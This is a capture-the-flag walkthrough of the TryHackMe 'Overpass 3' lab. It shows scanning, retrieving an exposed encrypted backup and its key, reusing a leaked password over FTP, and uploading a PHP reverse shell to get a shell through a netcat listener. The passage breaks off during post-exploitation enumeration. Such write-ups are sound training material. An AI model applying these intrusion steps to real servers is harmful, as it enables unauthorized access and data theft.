- Link: https://tryhackme.com/room/overpass3hosting
- Difficulty: Medium
- Creator: NinjaJc01
Overpassed? The Story so Far… Link to heading
While the original Overpass room (Writeup here) dealt with Password Managers, they were unfortunately hacked in Overpass 2 (Which is an excellent blue-team walkthrough). Since then the password manager went bust and the company has switched to web hosting in Overpass 3 Surely nothing can go wrong!
Looking Around Link to heading
So as always, we start by looking at what’s on our target. For this, I like to use Rustscan as it’s quite a bit faster than nmap alone.
rustscan -a $TARGET*IP -- -A
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
---
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
---
Nmap? More like slowmap.π’
[~] The config file is expected to be at "/home/hydra/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open $TARGET_IP:21
Open $TARGET_IP:22
Open $TARGET_IP:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-25 17:52 CET
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:52
Completed NSE at 17:52, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:52
Completed NSE at 17:52, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:52
Completed NSE at 17:52, 0.00s elapsed
Initiating Ping Scan at 17:52
Scanning $TARGET_IP [2 ports]
Completed Ping Scan at 17:52, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:52
Completed Parallel DNS resolution of 1 host. at 17:52, 1.01s elapsed
DNS resolution of 1 IPs took 1.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 17:52
Scanning $TARGET_IP [3 ports]
Discovered open port 80/tcp on $TARGET_IP
Discovered open port 22/tcp on $TARGET_IP
Discovered open port 21/tcp on $TARGET_IP
Completed Connect Scan at 17:52, 0.03s elapsed (3 total ports)
Initiating Service scan at 17:52
Scanning 3 services on $TARGET_IP
Completed Service scan at 17:52, 6.07s elapsed (3 services on 1 host)
NSE: Script scanning $TARGET_IP.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:52
Completed NSE at 17:52, 3.38s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:52
Completed NSE at 17:52, 0.21s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:52
Completed NSE at 17:52, 0.00s elapsed
Nmap scan report for $TARGET_IP
Host is up, received syn-ack (0.031s latency).
Scanned at 2021-01-25 17:52:05 CET for 11s
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack vsftpd 3.0.3
22/tcp open ssh syn-ack OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 de:5b:0e:b5:40:aa:43:4d:2a:83:31:14:20:77:9c:a1 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDfSHQR3OtIeAUFx18phN/nfAIQ2uGHuJs0epoqF184E4Xr8fkjSFJHdA6GsVyGUjdlPqylT8Lpa+UhSSegb8sm1So8Nz42bthsftsOxMQVb/tpQzMUfjcxQOiyVmgxfEqs2Zzdv6GtxwgZWhKHt7T369ejxnVrZhn0m6jzQNfRhVoQe/jC20RKvBf8l8s6/SusbZR5SFfsg71KyrSKOXOxs12GhXkdbP32K3sXVEpWgfCfmIZAc2ZxNtL5uPCM4AOfjIFJHl1z9EX04ZjQ1rMzzOh9pD/b+W2mXt2nQGzRPnc8LyGDE0hFtw4+lBCoiH8zIt14S7dwbFFV1mWxbtZXVf7JhPiZDM2vBfqyowsDZ5oc2qyR+JEU4pqeVhRygs41isej/el19G8+ehz4W07KR97eM2omB25JehO7E4tpX1l8Imjs1XjqhhVuGE2tru/p62SRQOKzRZ19MCIFPxleSLorrHq/uuKdvd8j6rm0A9BrCsiB6gmPfal6Kr55vlU=
| 256 f4:b5:a6:60:f4:d1:bf:e2:85:2e:2e:7e:5f:4c:ce:38 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAPAji9Nkb2U9TeP47Pz7BEa943WGOeu5XrRrTV0+CS0eGfNQyZkK6ZICNdeov65c2NWFPFsZTFjO8Sg+e2n/lM=
| 256 29:e6:61:09:ed:8a:88:2b:55:74:f2:b7:33:ae:df:c8 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIM/U6Td7C0nC8tiqS0Eejd+gQ3rjSyQW2DvcN0eoMFLS
80/tcp open http syn-ack Apache httpd 2.4.37 ((centos))
| http-methods:
| Supported Methods: GET POST OPTIONS HEAD TRACE
|_ Potentially risky methods: TRACE
|\_http-server-header: Apache/2.4.37 (centos)
|\_http-title: Overpass Hosting
Service Info: OS: Unix
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:52
Completed NSE at 17:52, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:52
Completed NSE at 17:52, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:52
Completed NSE at 17:52, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.10 seconds
Looks like we have ftp, ssh and http to play with. Let’s see if we can get an anonymous login on ftp to start.
FTP (take 1) Link to heading
ftp $TARGET_IP
Connected to $TARGET_IP.
220 (vsFTPd 3.0.3)
Name ($TARGET_IP:hydra): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
Login failed.
ftp> bye
221 Goodbye.
HTTP Then Link to heading
Guess not. Onward to http.
curl -v $TARGET_IP
- Trying $TARGET_IP:80...
- Connected to $TARGET_IP ($TARGET_IP) port 80 (#0)
> GET / HTTP/1.1
> Host: $TARGET_IP
> User-Agent: curl/7.74.0
> Accept: */*
- Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Mon, 25 Jan 2021 17:15:20 GMT
< Server: Apache/2.4.37 (centos)
< Last-Modified: Tue, 17 Nov 2020 20:42:56 GMT
< ETag: "6ea-5b4538a1d1400"
< Accept-Ranges: bytes
< Content-Length: 1770
< Content-Type: text/html; charset=UTF-8
<
<!DOCTYPE html>
<head>
<link rel="stylesheet" type="text/css" media="screen" href="main.css">
<title>Overpass Hosting</title>
</head>
<body>
<nav>
<img class="logo" src="overpass.svg" alt="Overpass logo">
<h2 class="navTitle">Overpass Hosting</h2>
</nav>
<div id="imageContainer">
<img src="hallway.jpg">
</div>
<main>
<h2>What can Overpass do for you?</h2>
<p>Overpass offer a range of web and email hosting solutions, ideal for both individuals and small businesses.
</p>
<p>We promise a 5 nines uptime,
<!-- 0.99999% is 5 nines, right? -->and negotiable service level agreements down to of a matter of days to keep your business
running smoothly even when technology gets in the way.
</p>
<h3>Meet the Team</h3>
<p>Our loyal employees span across multiple timezones and countries, so that you can always get the support you
need to keep your website online.</p>
<ul>
<li>Paradox - Our lead web designer, Paradox can help you create your dream website from the ground up</li>
<li>Elf - Overpass' newest intern, Elf. Elf helps maintain the webservers day to day to keep your
site running smoothly and quickly.</li>
<li>MuirlandOracle - HTTPS and networking specialist. Muir's many years of experience and enthusiasm for
networking keeps Overpass running, and your sites, online all of the time.</li>
<li>NinjaJc01 - James started Overpass, and keeps the business side running. If you have pricing questions
or want to discuss how Overpass can help your business, reach out to him!</li>
</ul>
</main>
</body>
* Connection #0 to host $TARGET_IP left intact
Aside from a snarky comment, there’s nothing here that we can easily exploit. Let’s try a directory scan.
Busting DoorsSites for Fun and Profit
Link to heading
So let’s break out the artillery and see what we have. For this, we can use FeroxBuster, which is a rust-based fuzzer that is incredibly fast (sometimes too fast…)
feroxbuster -u http://$TARGET_IP -f -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -d 1
___ ___ __ __ __ __ __ __
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher π€ ver: 1.12.3
ββββββββββββββββββββββββββββ¬ββββββββββββββββββββββ
π― Target Url β http://$TARGET_IP
π Threads β 50
π Wordlist β /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
π Status Codes β [200, 204, 301, 302, 307, 308, 401, 403, 405]
π₯ Timeout (secs) β 7
𦑠User-Agent β feroxbuster/1.12.3
πͺ Add Slash β true
π Recursion Depth β 1
π New Version Available β https://github.com/epi052/feroxbuster/releases/latest
ββββββββββββββββββββββββββββ΄ββββββββββββββββββββββ
π Press [ENTER] to use the Scan Cancel Menuβ’
ββββββββββββββββββββββββββββββββββββββββββββββββββ
200 1006l 4984w 0c http://$TARGET_IP/icons/
200 15l 55w 894c http://$TARGET_IP/backups/
403 9l 24w 219c http://$TARGET_IP/.htpasswd/
403 9l 24w 219c http://$TARGET_IP/.htaccess/
403 9l 24w 217c http://$TARGET_IP/cgi-bin/
[####################] - 12s 20473/20473 0s found:5 errors:0
[####################] - 12s 20473/20473 1684/s http://$TARGET_IP
Back Me Up and Back Me Down Link to heading
So we can see a backups folder. Let’s see what’s inside.
curl $TARGET_IP/backups/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /backups</title>
</head>
<body>
<h1>Index of /backups</h1>
<table>
<tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
<tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a> </td><td>&nbsp;</td><td align="right"> - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/compressed.gif" alt="[ ]"></td><td><a href="backup.zip">backup.zip</a>
</td><td align="right">2020-11-08 21:24 </td><td align="right"> 13K</td><td>&nbsp;</td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
</body></html>
It’s a bit of a mess, but this is a directory listing. Inside we see a file called backup.zip
, which is always a great target for the taking. Let’s grab it!
curl $TARGET_IP/backups/backup.zip -o backup.zip
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 13353 100 13353 0 0 149k 0 --:--:-- --:--:-- --:--:-- 149k
unzip backup.zip
Archive: backup.zip
extracting: CustomerDetails.xlsx.gpg
inflating: priv.key
GPG Decryption Link to heading
GPG encrypted data AND the key that goes with it? Let’s go!
gpg --import priv.key
gpg: key C9AE71AB3180BC08: public key "Paradox " imported
gpg: key C9AE71AB3180BC08: secret key imported
gpg: Total number processed: 1
gpg: imported: 1
gpg: secret keys read: 1
gpg: secret keys imported: 1
gpg -o CustomerDetails.xlsx -d CustomerDetails.xlsx.gpg
gpg: encrypted with 2048-bit RSA key, ID 9E86A1C63FB96335, created 2020-11-08
"Paradox "
So now we have an xlsx file, which as we all know is a Microsoft Excel file. We could just unzip it and try to decipher everything manually. But LibreOffice can also view these files.
The table is extracted here, with all the important bits redacted out, of course
Customer Name | Username | Password | Credit card number | CVC |
---|---|---|---|---|
Par. A. Doxx | paradox | ***************** | 4111 1111 4555 1142 | 432 |
0day Montgomery | 0day | ***************** | 5555 3412 4444 1115 | 642 |
Muir Land | muirlandoracle | ***************** | 5103 2219 1119 9245 | 737 |
Let’s see if anyone is silly enough to reuse passwords.
SSH? Link to heading
There’s no authentication on the website, so we probably need to look at another service to gain access. Let’s try ssh:
ssh paradox@$TARGET_IP
The authenticity of host '$TARGET_IP ($TARGET_IP)' can't be established.
ECDSA key fingerprint is SHA256:Zc/Zqa7e8cZI2SP2BSwt5iLz5wD3XTxIz2SLZMjoJmE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '$TARGET_IP' (ECDSA) to the list of known hosts.
paradox@$TARGET_IP: Permission denied (publickey,gssapi-keyex,gssapi-with-mic).
Welp that sucks, looks like he configured ssh properly. We can try the other two users as well.
ssh 0day@$TARGET_IP
0day@$TARGET_IP's password:
Permission denied, please try again.
0day@$TARGET_IP's password:
ssh muirlandoracle@$TARGET_IP
muirlandoracle@$TARGET_IP's password:
Permission denied, please try again.
muirlandoracle@$TARGET_IP's password:
No dice. this leaves FTP
FTP (Take 2) Link to heading
let’s try ftp with paradox
ftp $TARGET_IP
Connected to $TARGET_IP.
220 (vsFTPd 3.0.3)
Name ($TARGET_IP:hydra): paradox
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 48 48 24 Nov 08 21:25 backups
-rw-r--r-- 1 0 0 65591 Nov 17 20:42 hallway.jpg
-rw-r--r-- 1 0 0 1770 Nov 17 20:42 index.html
-rw-r--r-- 1 0 0 576 Nov 17 20:42 main.css
-rw-r--r-- 1 0 0 2511 Nov 17 20:42 overpass.svg
226 Directory send OK.
ftp> bye
221 Goodbye.
This looks suspiciously like the website, I wonder if it’s pointing to a live server? We can try uploading a file.
echo "Hello, World!" > test.txt
ftp $TARGET_IP
Connected to $TARGET_IP.
220 (vsFTPd 3.0.3)
Name ($TARGET_IP:hydra): paradox
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put test.txt
local: test.txt remote: test.txt
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
14 bytes sent in 0.00 secs (290.8910 kB/s)
ftp> bye
221 Goodbye.
curl -v http://$TARGET_IP/test.txt
* Trying $TARGET_IP:80...
* Connected to $TARGET_IP ($TARGET_IP) port 80 (#0)
> GET /test.txt HTTP/1.1
> Host: $TARGET_IP
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Mon, 25 Jan 2021 19:43:48 GMT
< Server: Apache/2.4.37 (centos)
< Last-Modified: Mon, 25 Jan 2021 19:43:38 GMT
< ETag: "e-5b9bec118dbfd"
< Accept-Ranges: bytes
< Content-Length: 14
< Content-Type: text/plain; charset=UTF-8
<
Hello, World!
* Connection #0 to host $TARGET_IP left intact
We can upload files to a web server, huzzah, do we have php? Let’s check with a simple php file.
echo '' > info.php
ftp $TARGET_IP
Connected to $TARGET_IP.
220 (vsFTPd 3.0.3)
Name ($TARGET_IP:hydra): paradox
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put info.php
local: info.php remote: info.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
20 bytes sent in 0.00 secs (476.3719 kB/s)
ftp> bye
221 Goodbye.
curl -v http://$TARGET_IP/info.php
* Trying $TARGET_IP:80...
* Connected to $TARGET_IP ($TARGET_IP) port 80 (#0)
> GET /info.php HTTP/1.1
> Host: $TARGET_IP
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Mon, 25 Jan 2021 20:23:14 GMT
< Server: Apache/2.4.37 (centos)
< X-Powered-By: PHP/7.2.24
< Transfer-Encoding: chunked
< Content-Type: text/html; charset=UTF-8
<
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; color: #222; font-family: sans-serif;}
pre {margin: 0; font-family: monospace;}
a:link {color: #009; text-decoration: none; background-color: #fff;}
a:hover {text-decoration: underline;}
table {border-collapse: collapse; border: 0; width: 934px; box-shadow: 1px 2px 3px #ccc;}
.center {text-align: center;}
.center table {margin: 1em auto; text-align: left;}
.center th {text-align: center !important;}
td, th {border: 1px solid #666; font-size: 75%; vertical-align: baseline; padding: 4px 5px;}
h1 {font-size: 150%;}
h2 {font-size: 125%;}
.p {text-align: left;}
.e {background-color: #ccf; width: 300px; font-weight: bold;}
.h {background-color: #99c; font-weight: bold;}
.v {background-color: #ddd; max-width: 300px; overflow-x: auto; word-wrap: break-word;}
.v i {color: #999;}
img {float: right; border: 0;}
hr {width: 934px; background-color: #ccc; border: 0; height: 1px;}
</style>
<title>phpinfo()</title><meta name="ROBOTS" content="NOINDEX,NOFOLLOW,NOARCHIVE" /></head>
<body><div class="center">
<table>
<tr class="h"><td>
<a href="http://www.php.net/"><img border="0" src="data:image/png;base64,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" alt="PHP logo" /></a><h1 class="p">PHP Version 7.2.24</h1>
</td></tr>
</table>
<table>
<tr><td class="e">System </td><td class="v">Linux ip-10-10-71-195 4.18.0-193.el8.x86_64 #1 SMP Fri May 8 10:59:10 UTC 2020 x86_64 </td></tr>
<tr><td class="e">Build Date </td><td class="v">Oct 22 2019 08:28:36 </td></tr>
<tr><td class="e">Server API </td><td class="v">FPM/FastCGI </td></tr>
<tr><td class="e">Virtual Directory Support </td><td class="v">disabled </td></tr>
<tr><td class="e">Configuration File (php.ini) Path </td><td class="v">/etc </td></tr>
<tr><td class="e">Loaded Configuration File </td><td class="v">/etc/php.ini </td></tr>
<tr><td class="e">Scan this dir for additional .ini files </td><td class="v">/etc/php.d </td></tr>
<!-- Snipping this out because we don't really care -->
</td></tr>
</table>
* Connection #0 to host $TARGET_IP left intact
</div></body></html>
We have PHP, awesome. It’s reverse shell time!
Reversing a Shell Link to heading
We have a handy php reverse shell located at /usr/share/webshells/php/php-reverse-shell.php
on Kali linux. Alternatively, we can always get one from the net.
So first we tab open a new terminal and kickstart our listener:
nc -lvnp 4242
Listening on 0.0.0.0 4242
Then we ftp over out shell to the server, and launch it.
ftp $TARGET_IP
Connected to $TARGET_IP.
220 (vsFTPd 3.0.3)
Name ($TARGET_IP:hydra): paradox
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put shell.php
local: shell.php remote: shell.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
5493 bytes sent in 0.00 secs (16.3704 MB/s)
ftp> bye
221 Goodbye.
curl http://$TARGET_IP/shell.php
On our listener, we should see:
Connection received on $TARGET_IP 54054
Linux ip-10-10-71-195 4.18.0-193.el8.x86_64 #1 SMP Fri May 8 10:59:10 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
20:32:32 up 3:51, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: cannot set terminal process group (871): Inappropriate ioctl for device
sh: no job control in this shell
sh-4.4$
First thing’s first is to stabilize our shell, let’s try with python3
sh-4.4$ python3 -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
bash-4.4$
Web Flag Link to heading
Ok let’s start hunting for the web flag. First we’ll check the /var/www directory to see if we can find anything.
cd /var/www
cd /var/www
ls -la
ls -la
total 4
drwxr-xr-x. 4 root root 33 Nov 8 02:02 .
drwxr-xr-x. 21 root root 4096 Nov 8 02:02 ..
